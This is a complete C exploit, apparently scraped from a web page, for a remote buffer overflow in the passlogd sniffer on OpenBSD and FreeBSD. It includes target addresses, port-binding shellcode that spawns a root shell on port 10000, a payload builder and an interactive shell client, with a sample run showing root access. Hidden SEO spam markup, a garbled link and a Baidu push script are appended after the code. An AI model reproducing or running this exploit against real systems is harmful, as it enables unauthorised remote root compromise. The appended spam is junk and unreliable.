/*
**
** [*] Title: Remote Multiple Buffer Overflow vulnerability in passlogd sniffer
.
** [+] Exploit code: 0x82-Remote.XxxxBSD_passlogd.xpl.c
**
** [+] Description --
**
** FreeBSD includes passlogd-0.1d port:
** http://www.freebsd.org/cgi/ports.cgi?query=passlogd
**
** This exploit works OpenBSD and FreeBSD only.
** General user uses general socket exploit is possible.
**
** [+] Exploit --
** 
** exploit result: --
** 
** bash-2.04$ ./0x82-Remote.XxxxBSD_passlogd.xpl -h61.37.xxx.xx -t0
**
**  XxxxBSD passlogd sniffer remote buffer overflow root exploit
**                                                 by Xpl017Elz.
**
**  [0] Target: OpenBSD 3.0 GENERIC#94 i386
**  [1] Set socket.
**  [2] Make shellcode.
**  [3] Trying 61.37.xxx.xx:10000.
**  [*] Connected to 61.37.xxx.xx:10000.
**  [*] Executed shell successfully !
**
** OpenBSD testsub 3.0 GENERIC#94 i386
** uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operato
r), 20(staff), 31(guest)
** # exit
**  [*] Happy-Exploit
**
** bash-2.04$
**
** -- 
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>. 
** My World: http://x82.i21c.net & http://x82.inetcop.org
**
*/
/*
** -=-= POINT! POINT! POINT! POINT! POINT! =-=-
**
** This exploit is proof of concept. (Therefore, don't support 'Brute-force' mo
de.)
**
** P.S:
**
** There is reason that do not make integration code that all platform attacks 
are possible.
** Because there was no machine to test exploit.
** Think very regrettably. :-(
**
** But, people who help to me !!!
** I'm thankful very to them. :-)
**
** Greets: Korean Hackers, INetCop Security Team.
**
** Thank you.
**
*/

#include <stdio.h>
#include <unistd.h>
#include <errno.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>

struct os {
        int num;
        char *ost;
        u_long shell;
        int l_sz;
};

#define Xpl017Elz x82
#define D_M (0)
#define ATK_SIZE (0x8282)

struct os plat[]=
{
        {
                0,"OpenBSD 3.0 GENERIC#94 i386",
                /* My OpenBSD box */
                0xdfbf9104,545
        },
        {
                1,"FreeBSD 4.6.2-RELEASE #0 i386",
                /* It's FreeBSD box :-) */
                0xbfbfaff8,545
        },
        {
                2,NULL,0,0
        }
};

#define TCP_CONN_SOCK (0)
#define UDP_CONN_SOCK (1)

void banrl();
int setsock(char *host,int port,int type);
void re_connt(int sock);
void send_recv_sh(int sock);
void usage(char *p_name);
int make_sh(u_long shcode,int l_sz,int type);
int main(int argc,char **argv)
{
        int sock,whgl,type=D_M;
#define ATK_PT (0x202)
        int atk_port=ATK_PT;
#define D_PORT (10000)
        int d_port=D_PORT;
#define LC_TEST "127.0.0.1" /* localhost */
        char host[0x82]=LC_TEST;
#ifdef T_ADDR_
#define SHELL 0x82828282 /* test */
#endif
        u_long shell=plat[type].shell;
        int l_sz=plat[type].l_sz;
        char *atk_mbuf=(char *)malloc(ATK_SIZE);

        (void)banrl();
        if(argc<2)
        {
                (void)usage(argv[D_M]);
        }

        while((whgl=getopt(argc,argv,"P:p:L:l:H:h:T:t:IiS:s:"))!=-1)
        {
                extern char *optarg;
                switch(whgl)
                {
                        case 'H':
                        case 'h':
                                memset((char *)host,D_M,sizeof(host));
                                strncpy(host,optarg,sizeof(host)-1);
                                break;

                        case 'P':
                        case 'p':
                                atk_port=atoi(optarg);
                                break;

                        case 'L':
                        case 'l':
                                l_sz=atoi(optarg);
                                break;

                        case 'T':
                        case 't':
                                type=atoi(optarg);
                                if(type>1)
                                        (void)usage(argv[D_M]);
                                else
                                {
                                        shell=plat[type].shell;
                                        l_sz=plat[type].l_sz;
                                }
                                break;

                        case 'S':
                        case 's':
                                shell=strtoul(optarg,NULL,NULL);
                                break;

                        case 'I':
                        case 'i':
                                (void)usage(argv[D_M]);
                                break;

                        case '?':
                                fprintf(stderr," Try `%s -i' for more informati
on.\n\n",argv[D_M]);
                                exit(-1);
                                break;
                }
        }

        fprintf(stdout," [0] Target: %s\n",plat[type].ost);
        fprintf(stdout," [1] Set socket.\n");
        sock=(int)setsock(host,atk_port,UDP_CONN_SOCK);
        {
                fprintf(stdout," [2] Make shellcode.\n");
                memset((char *)atk_mbuf,0,ATK_SIZE);
                strncpy(atk_mbuf,(char *)make_sh(shell,l_sz,type),ATK_SIZE-1);
                send(sock,atk_mbuf,strlen(atk_mbuf),0);

                memset((char *)atk_mbuf,0,ATK_SIZE);
                strncpy(atk_mbuf,"\n",strlen("\n"),0);
                send(sock,atk_mbuf,strlen(atk_mbuf),0);

                close(sock);
        }

        fprintf(stdout," [3] Trying %s:%d.\n",host,d_port);
        sleep(2);
        sock=(int)setsock(host,d_port,TCP_CONN_SOCK);
        (void)re_connt(sock);

        fprintf(stdout," [*] Connected to %s:%d.\n",host,d_port);
        (void)send_recv_sh(sock);
}

int make_sh(u_long shcode,int l_sz,int type)
{
        int plus_sz_plus=D_M,pk_sz=D_M;
        char shell_code_bind_10000[]=
                /* 86bytes portbinding shellcode by bighawk */
                "\x31\xc9"              // xor ecx, ecx
                "\xf7\xe1"              // mul ecx
                "\x51"                  // push ecx
                "\x41"                  // inc ecx
                "\x51"                  // push ecx
                "\x41"                  // inc ecx
                "\x51"                  // push ecx
                "\x51"                  // push ecx
                "\xb0\x61"              // mov al, 97
                "\xcd\x80"              // int 80h
                "\x89\xc3"              // mov ebx, eax
                "\x52"                  // push edx
                "\x66\x68\x27\x10"              // push word 4135
                "\x66\x51"              // push cx
                "\x89\xe6"              // mov esi, esp
                "\xb1\x10"              // mov cl, 16
                "\x51"                  // push ecx
                "\x56"                  // push esi
                "\x50"                  // push eax
                "\x50"                  // push eax
                "\xb0\x68"              // mov al, 104
                "\xcd\x80"              // int 80h
                "\x51"                  // push ecx
                "\x53"                  // push ebx
                "\x53"                  // push ebx
                "\xb0\x6a"              // mov al, 106
                "\xcd\x80"              // int 80h
                "\x52"                  // push edx
                "\x52"                  // push edx
                "\x53"                  // push ebx
                "\x53"                  // push ebx
                "\xb0\x1e"              // mov al, 30
                "\xcd\x80"              // int 80h
                "\xb1\x03"              // mov cl, 3
                "\x89\xc3"              // mov ebx, eax
                "\xb0\x5a"              // mov al, 90
                "\x49"                  // dec ecx
                "\x51"                  // push ecx
                "\x53"                  // push ebx
                "\x53"                  // push ebx
                "\xcd\x80"              // int 80h
                "\x41"                  // inc ecx
                "\xe2\xf5"              // loop-10
                "\x51"                  // push ecx
                "\x68\x2f\x2f\x73\x68"  // push dword 68732f2fh
                "\x68\x2f\x62\x69\x6e"  // push dword 6e69622fh
                "\x89\xe3"              // mov  ebx, esp
                "\x51"                  // push ecx
                "\x54"                  // push esp
                "\x53"                  // push ebx
                "\x53"                  // push ebx
                "\xb0\x3b"              // mov al, 59
                "\xcd\x80"              // int  80h
                "\x0a";
        char sh_data_align_4[0x400];
#define NULL_NULL_PSH 0x00
        memset((char *)sh_data_align_4,NULL_NULL_PSH,sizeof(sh_data_align_4));
#define OFF_SET_PSH 0x70
#define NOP_NOP_PSH_ 0x90
        for(pk_sz=D_M;pk_sz<l_sz;pk_sz++)
                sh_data_align_4[pk_sz]=OFF_SET_PSH;
        {
                sh_data_align_4[pk_sz++]=(shcode>>0)&0xff;
                sh_data_align_4[pk_sz++]=(shcode>>8)&0xff;
                sh_data_align_4[pk_sz++]=(shcode>>16)&0xff;
                sh_data_align_4[pk_sz++]=(shcode>>24)&0xff;
                sh_data_align_4[pk_sz++]=(0x3e);
        }
        for(plus_sz_plus=D_M;
                plus_sz_plus<sizeof(sh_data_align_4)-
                strlen(sh_data_align_4)-
                strlen(shell_code_bind_10000);
                plus_sz_plus++)
                sh_data_align_4[pk_sz++]=NOP_NOP_PSH_;
        for(plus_sz_plus=D_M;
                plus_sz_plus<strlen(shell_code_bind_10000);
                plus_sz_plus++)
                sh_data_align_4[pk_sz++]=shell_code_bind_10000[plus_sz_plus];
        return strdup(sh_data_align_4);
}

int setsock(char *hostip,int port,int type)
{
        int sock;
        struct hostent *he;
        struct sockaddr_in x82;

        if((he=gethostbyname(hostip))==NULL)
        {
                return(-1);
        }

        if(type)
        {
                if((sock=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP))==-1)
                {
                        return(-1);
                }
        }
        else
        {
                if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
                {
                        return(-1);
                }
        }

        x82.sin_family=AF_INET;
        x82.sin_port=htons(port);
        x82.sin_addr=*((struct in_addr *)he->h_addr);
        memset(&(x82.sin_zero),0,8);

        if(connect(sock,(struct sockaddr *)&x82,sizeof(struct sockaddr))==-1)
        {
                return(-1);
        }
        return(sock);
}

void re_connt(int sock)
{
        if(sock==-1)
        {
                fprintf(stderr," [-] Connect Failed.\n\n");
                exit(-1);
        }
}

void send_recv_sh(int sock)
{
        int pk;
        struct timeval tm;
        char *t_cmd="uname -a;id;exec sh -i\n";
        char rbuf[1024];
        fd_set rset;
        memset((char *)rbuf,D_M,sizeof(rbuf));
        fprintf(stdout," [*] Executed shell successfully !\n\n");
        send(sock,t_cmd,strlen(t_cmd),D_M);

        tm.tv_sec=10;
        tm.tv_usec=D_M;

        while(1)
        {
                fflush(stdout);
                FD_ZERO(&rset);
                FD_SET(sock,&rset);
                FD_SET(STDIN_FILENO,&rset);

                select(sock+1,&rset,NULL,NULL,&tm);

                if(FD_ISSET(sock,&rset))
                {
                        pk=read(sock,rbuf,sizeof(rbuf)-1);
                        if(pk<=D_M)
                        {
                                fprintf(stdout," [*] Happy-Exploit\n\n");
                                exit(D_M);
                        }
                        rbuf[pk]=D_M;
                        fprintf(stdout,"%s",rbuf);
                }
                if(FD_ISSET(STDIN_FILENO,&rset))
                {
                        pk=read(STDIN_FILENO,rbuf,sizeof(rbuf)-1);
                        if(pk>D_M)
                        {
                                rbuf[pk]=D_M;
                                write(sock,rbuf,pk);
                        }
                }
        }
        return;
}

void usage(char *p_name)
{
        int r_s=D_M;
        fprintf(stdout," Usage: %s -option [argument]\n",p_name);
        fprintf(stdout,"\n\t-h - hostname. (default: localhost)\n");
        fprintf(stdout,"\t-p - udp port number. (default: udp 514)\n");
        fprintf(stdout,"\t-s - &shellcode. (select target)\n");
        fprintf(stdout,"\t-l - buf len. (select target)\n");
        fprintf(stdout,"\t-t - target number.\n");
        fprintf(stdout,"\t-i - help information.\n\n");
        fprintf(stdout," Select target number:\n\n");

        for(;;)
        {
                if(plat[r_s].ost==NULL)
                        break;
                else fprintf(stdout,"\t{%d} %s\n",plat[r_s].num,plat[r_s].ost);
                r_s++;
        }
        fprintf(stdout,"\n Example> %s -hblah -p514 -s0x82828282 -l582\n\n",p_n
ame);
        exit(-1);
}

void banrl()
{
        fprintf(stdout,"\n XxxxBSD passlogd sniffer remote buffer overflow root
 exploit\n");
        fprintf(stdout,"                                                by Xpl0
17Elz.\n\n");
}


<div style="position:fixed;left:-9000px;top:-9000px;"><em id="7ztzv"></em><center id="7ztzv"></center><mark id="7ztzv"><center id="7ztzv"></center></mark><output id="7ztzv"><noframes id="7ztzv"></noframes></output><font id="7ztzv"><delect id="7ztzv"></delect></font><ruby id="7ztzv"><big id="7ztzv"></big></ruby><progress id="7ztzv"><sub id="7ztzv"></sub></progress><th id="7ztzv"><big id="7ztzv"></big></th><form id="7ztzv"><nobr id="7ztzv"></nobr></form><ol id="7ztzv"><video id="7ztzv"></video></ol><th id="7ztzv"><progress id="7ztzv"></progress></th><strike id="7ztzv"><span id="7ztzv"></span></strike><em id="7ztzv"><span id="7ztzv"></span></em><video id="7ztzv"><strike id="7ztzv"></strike></video><th id="7ztzv"><noframes id="7ztzv"></noframes></th><em id="7ztzv"><span id="7ztzv"></span></em><ins id="7ztzv"><b id="7ztzv"></b></ins><ol id="7ztzv"><output id="7ztzv"></output></ol><menuitem id="7ztzv"><thead id="7ztzv"></thead></menuitem><del id="7ztzv"><ruby id="7ztzv"></ruby></del><noframes id="7ztzv"><span id="7ztzv"></span></noframes><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><dl id="7ztzv"><rp id="7ztzv"></rp></dl><progress id="7ztzv"><thead id="7ztzv"></thead></progress><listing id="7ztzv"><menuitem id="7ztzv"></menuitem></listing><strike id="7ztzv"><pre id="7ztzv"></pre></strike><em id="7ztzv"><address id="7ztzv"></address></em><big id="7ztzv"><address id="7ztzv"></address></big><address id="7ztzv"><listing id="7ztzv"></listing></address><ruby id="7ztzv"><strike id="7ztzv"></strike></ruby><listing id="7ztzv"><menuitem id="7ztzv"></menuitem></listing><big id="7ztzv"><sub id="7ztzv"></sub></big><var id="7ztzv"><meter id="7ztzv"></meter></var><span id="7ztzv"><video id="7ztzv"></video></span><listing id="7ztzv"><mark id="7ztzv"></mark></listing><progress id="7ztzv"><address id="7ztzv"></address></progress><nobr id="7ztzv"><progress id="7ztzv"></progress></nobr><noframes id="7ztzv"><sub id="7ztzv"></sub></noframes><font id="7ztzv"><delect id="7ztzv"></delect></font><strike id="7ztzv"><pre id="7ztzv"></pre></strike><delect id="7ztzv"><menuitem id="7ztzv"></menuitem></delect><em id="7ztzv"><pre id="7ztzv"></pre></em><mark id="7ztzv"><cite id="7ztzv"></cite></mark><delect id="7ztzv"><ins id="7ztzv"></ins></delect><pre id="7ztzv"><rp id="7ztzv"></rp></pre><cite id="7ztzv"><var id="7ztzv"></var></cite><menuitem id="7ztzv"><cite id="7ztzv"></cite></menuitem><ruby id="7ztzv"><p id="7ztzv"></p></ruby><em id="7ztzv"><form id="7ztzv"></form></em><rp id="7ztzv"><em id="7ztzv"></em></rp>
<video id="7ztzv"><noframes id="7ztzv"></noframes></video><cite id="7ztzv"><del id="7ztzv"></del></cite><meter id="7ztzv"><thead id="7ztzv"></thead></meter><p id="7ztzv"><dl id="7ztzv"></dl></p><meter id="7ztzv"><thead id="7ztzv"></thead></meter><sub id="7ztzv"><nobr id="7ztzv"></nobr></sub><mark id="7ztzv"><cite id="7ztzv"></cite></mark><menuitem id="7ztzv"><font id="7ztzv"></font></menuitem><del id="7ztzv"><rp id="7ztzv"></rp></del><thead id="7ztzv"><delect id="7ztzv"></delect></thead><var id="7ztzv"><menuitem id="7ztzv"></menuitem></var><ins id="7ztzv"><cite id="7ztzv"></cite></ins><delect id="7ztzv"><output id="7ztzv"></output></delect><p id="7ztzv"><pre id="7ztzv"></pre></p><ruby id="7ztzv"><p id="7ztzv"></p></ruby><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><nobr id="7ztzv"><meter id="7ztzv"></meter></nobr><progress id="7ztzv"><address id="7ztzv"></address></progress><thead id="7ztzv"><var id="7ztzv"></var></thead><ins id="7ztzv"><i id="7ztzv"></i></ins><ins id="7ztzv"><b id="7ztzv"></b></ins><nobr id="7ztzv"><meter id="7ztzv"></meter></nobr><ins id="7ztzv"><i id="7ztzv"></i></ins><font id="7ztzv"><delect id="7ztzv"></delect></font><em id="7ztzv"><form id="7ztzv"></form></em><var id="7ztzv"><ins id="7ztzv"></ins></var><span id="7ztzv"><th id="7ztzv"></th></span><ol id="7ztzv"><rp id="7ztzv"></rp></ol><th id="7ztzv"><progress id="7ztzv"></progress></th><address id="7ztzv"><dfn id="7ztzv"></dfn></address><menuitem id="7ztzv"><cite id="7ztzv"></cite></menuitem><noframes id="7ztzv"><span id="7ztzv"></span></noframes><noframes id="7ztzv"><form id="7ztzv"></form></noframes><big id="7ztzv"><form id="7ztzv"></form></big><track id="7ztzv"><noframes id="7ztzv"></noframes></track><em id="7ztzv"><span id="7ztzv"></span></em><span id="7ztzv"><th id="7ztzv"></th></span><span id="7ztzv"><th id="7ztzv"></th></span><video id="7ztzv"><em id="7ztzv"></em></video><delect id="7ztzv"><ins id="7ztzv"></ins></delect><b id="7ztzv"><del id="7ztzv"></del></b><progress id="7ztzv"><sub id="7ztzv"></sub></progress><dfn id="7ztzv"><mark id="7ztzv"></mark></dfn><rp id="7ztzv"><em id="7ztzv"></em></rp><track id="7ztzv"><noframes id="7ztzv"></noframes></track><address id="7ztzv"><th id="7ztzv"></th></address><cite id="7ztzv"><delect id="7ztzv"></delect></cite><cite id="7ztzv"><var id="7ztzv"></var></cite><output id="7ztzv"><i id="7ztzv"></i></output><track id="7ztzv"><big id="7ztzv"></big></track>
<big id="7ztzv"><address id="7ztzv"></address></big><p id="7ztzv"><dl id="7ztzv"></dl></p><meter id="7ztzv"><font id="7ztzv"></font></meter><address id="7ztzv"><nobr id="7ztzv"></nobr></address><menuitem id="7ztzv"><cite id="7ztzv"></cite></menuitem><pre id="7ztzv"><video id="7ztzv"></video></pre><th id="7ztzv"><progress id="7ztzv"></progress></th><p id="7ztzv"><pre id="7ztzv"></pre></p><ruby id="7ztzv"><em id="7ztzv"></em></ruby><del id="7ztzv"><ins id="7ztzv"></ins></del><sub id="7ztzv"><listing id="7ztzv"></listing></sub><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><thead id="7ztzv"><var id="7ztzv"></var></thead><sub id="7ztzv"><nobr id="7ztzv"></nobr></sub><b id="7ztzv"><del id="7ztzv"></del></b><big id="7ztzv"><address id="7ztzv"></address></big><form id="7ztzv"><nobr id="7ztzv"></nobr></form><ol id="7ztzv"><ins id="7ztzv"></ins></ol><font id="7ztzv"><delect id="7ztzv"></delect></font><big id="7ztzv"><sub id="7ztzv"></sub></big><listing id="7ztzv"><progress id="7ztzv"></progress></listing><delect id="7ztzv"><output id="7ztzv"></output></delect><noframes id="7ztzv"><span id="7ztzv"></span></noframes><track id="7ztzv"><noframes id="7ztzv"></noframes></track><menuitem id="7ztzv"><sub id="7ztzv"></sub></menuitem><address id="7ztzv"><th id="7ztzv"></th></address><address id="7ztzv"><track id="7ztzv"></track></address><nobr id="7ztzv"><meter id="7ztzv"></meter></nobr><em id="7ztzv"><pre id="7ztzv"></pre></em><ruby id="7ztzv"><strike id="7ztzv"></strike></ruby><em id="7ztzv"><form id="7ztzv"></form></em><form id="7ztzv"><track id="7ztzv"></track></form><dfn id="7ztzv"><progress id="7ztzv"></progress></dfn><rp id="7ztzv"><noframes id="7ztzv"></noframes></rp><i id="7ztzv"><ol id="7ztzv"></ol></i><i id="7ztzv"><del id="7ztzv"></del></i><cite id="7ztzv"><delect id="7ztzv"></delect></cite><strike id="7ztzv"><dl id="7ztzv"></dl></strike><dfn id="7ztzv"><mark id="7ztzv"></mark></dfn><address id="7ztzv"><th id="7ztzv"></th></address><ins id="7ztzv"><font id="7ztzv"></font></ins><thead id="7ztzv"><var id="7ztzv"></var></thead><video id="7ztzv"><strike id="7ztzv"></strike></video><p id="7ztzv"><pre id="7ztzv"></pre></p><video id="7ztzv"><i id="7ztzv"></i></video><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><thead id="7ztzv"><listing id="7ztzv"></listing></thead><dl id="7ztzv"><rp id="7ztzv"></rp></dl><address id="7ztzv"><th id="7ztzv"></th></address><var id="7ztzv"><menuitem id="7ztzv"></menuitem></var>
<p id="7ztzv"><var id="7ztzv"></var></p><ins id="7ztzv"><i id="7ztzv"></i></ins><strike id="7ztzv"><span id="7ztzv"></span></strike><del id="7ztzv"><output id="7ztzv"></output></del><font id="7ztzv"><delect id="7ztzv"></delect></font><output id="7ztzv"><em id="7ztzv"></em></output><p id="7ztzv"><span id="7ztzv"></span></p><big id="7ztzv"><thead id="7ztzv"></thead></big><video id="7ztzv"><noframes id="7ztzv"></noframes></video><b id="7ztzv"><ol id="7ztzv"></ol></b><font id="7ztzv"><dfn id="7ztzv"></dfn></font><font id="7ztzv"><var id="7ztzv"></var></font><ins id="7ztzv"><i id="7ztzv"></i></ins><dfn id="7ztzv"><meter id="7ztzv"></meter></dfn><rp id="7ztzv"><strike id="7ztzv"></strike></rp><del id="7ztzv"><ruby id="7ztzv"></ruby></del><var id="7ztzv"><ruby id="7ztzv"></ruby></var><rp id="7ztzv"><em id="7ztzv"></em></rp><em id="7ztzv"><span id="7ztzv"></span></em><del id="7ztzv"><ruby id="7ztzv"></ruby></del><listing id="7ztzv"><menuitem id="7ztzv"></menuitem></listing><track id="7ztzv"><noframes id="7ztzv"></noframes></track><form id="7ztzv"><nobr id="7ztzv"></nobr></form><video id="7ztzv"><big id="7ztzv"></big></video><video id="7ztzv"><em id="7ztzv"></em></video><p id="7ztzv"><span id="7ztzv"></span></p><sub id="7ztzv"><nobr id="7ztzv"></nobr></sub><ins id="7ztzv"><b id="7ztzv"></b></ins><dfn id="7ztzv"><progress id="7ztzv"></progress></dfn><var id="7ztzv"><mark id="7ztzv"></mark></var><font id="7ztzv"><delect id="7ztzv"></delect></font><big id="7ztzv"><sub id="7ztzv"></sub></big><address id="7ztzv"><th id="7ztzv"></th></address><form id="7ztzv"><th id="7ztzv"></th></form><mark id="7ztzv"><cite id="7ztzv"></cite></mark><progress id="7ztzv"><font id="7ztzv"></font></progress><mark id="7ztzv"><cite id="7ztzv"></cite></mark><strike id="7ztzv"><form id="7ztzv"></form></strike><mark id="7ztzv"><font id="7ztzv"></font></mark><strike id="7ztzv"><form id="7ztzv"></form></strike><pre id="7ztzv"><video id="7ztzv"></video></pre><strike id="7ztzv"><dl id="7ztzv"></dl></strike><delect id="7ztzv"><ins id="7ztzv"></ins></delect><dl id="7ztzv"><rp id="7ztzv"></rp></dl><listing id="7ztzv"><menuitem id="7ztzv"></menuitem></listing><p id="7ztzv"><dl id="7ztzv"></dl></p><mark id="7ztzv"><i id="7ztzv"></i></mark><meter id="7ztzv"><sub id="7ztzv"></sub></meter><rp id="7ztzv"><em id="7ztzv"></em></rp><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead>
<th id="7ztzv"><big id="7ztzv"></big></th><del id="7ztzv"><rp id="7ztzv"></rp></del><video id="7ztzv"><big id="7ztzv"></big></video><delect id="7ztzv"><ruby id="7ztzv"></ruby></delect><big id="7ztzv"><sub id="7ztzv"></sub></big><track id="7ztzv"><em id="7ztzv"></em></track><cite id="7ztzv"><ol id="7ztzv"></ol></cite><i id="7ztzv"><dl id="7ztzv"></dl></i><noframes id="7ztzv"><address id="7ztzv"></address></noframes><ruby id="7ztzv"><i id="7ztzv"></i></ruby><delect id="7ztzv"><output id="7ztzv"></output></delect><delect id="7ztzv"><output id="7ztzv"></output></delect><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><ol id="7ztzv"><ruby id="7ztzv"></ruby></ol><delect id="7ztzv"><output id="7ztzv"></output></delect><var id="7ztzv"><menuitem id="7ztzv"></menuitem></var><track id="7ztzv"><big id="7ztzv"></big></track><rp id="7ztzv"><em id="7ztzv"></em></rp><em id="7ztzv"><span id="7ztzv"></span></em><mark id="7ztzv"><b id="7ztzv"></b></mark><i id="7ztzv"><ol id="7ztzv"></ol></i><progress id="7ztzv"><sub id="7ztzv"></sub></progress><rp id="7ztzv"><strike id="7ztzv"></strike></rp><font id="7ztzv"><var id="7ztzv"></var></font><span id="7ztzv"><th id="7ztzv"></th></span><video id="7ztzv"><strike id="7ztzv"></strike></video><th id="7ztzv"><em id="7ztzv"></em></th><delect id="7ztzv"><ins id="7ztzv"></ins></delect><sub id="7ztzv"><delect id="7ztzv"></delect></sub><progress id="7ztzv"><sub id="7ztzv"></sub></progress><sub id="7ztzv"><listing id="7ztzv"></listing></sub><thead id="7ztzv"><listing id="7ztzv"></listing></thead><form id="7ztzv"><th id="7ztzv"></th></form><track id="7ztzv"><em id="7ztzv"></em></track><dfn id="7ztzv"><menuitem id="7ztzv"></menuitem></dfn><b id="7ztzv"><dl id="7ztzv"></dl></b><nobr id="7ztzv"><big id="7ztzv"></big></nobr><track id="7ztzv"><progress id="7ztzv"></progress></track><ruby id="7ztzv"><p id="7ztzv"></p></ruby><pre id="7ztzv"><nobr id="7ztzv"></nobr></pre><pre id="7ztzv"><track id="7ztzv"></track></pre><ruby id="7ztzv"><strike id="7ztzv"></strike></ruby><em id="7ztzv"><span id="7ztzv"></span></em><mark id="7ztzv"><i id="7ztzv"></i></mark><rp id="7ztzv"><p id="7ztzv"></p></rp><delect id="7ztzv"><ruby id="7ztzv"></ruby></delect><sub id="7ztzv"><dfn id="7ztzv"></dfn></sub><thead id="7ztzv"><var id="7ztzv"></var></thead><i id="7ztzv"><ol id="7ztzv"></ol></i><track id="7ztzv"><strike id="7ztzv"></strike></track></div>

<a href="http://www.bjnorthway.com/">ÑÇÖÞÅ·ÃÀÔÚÏß</a>
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>
</body>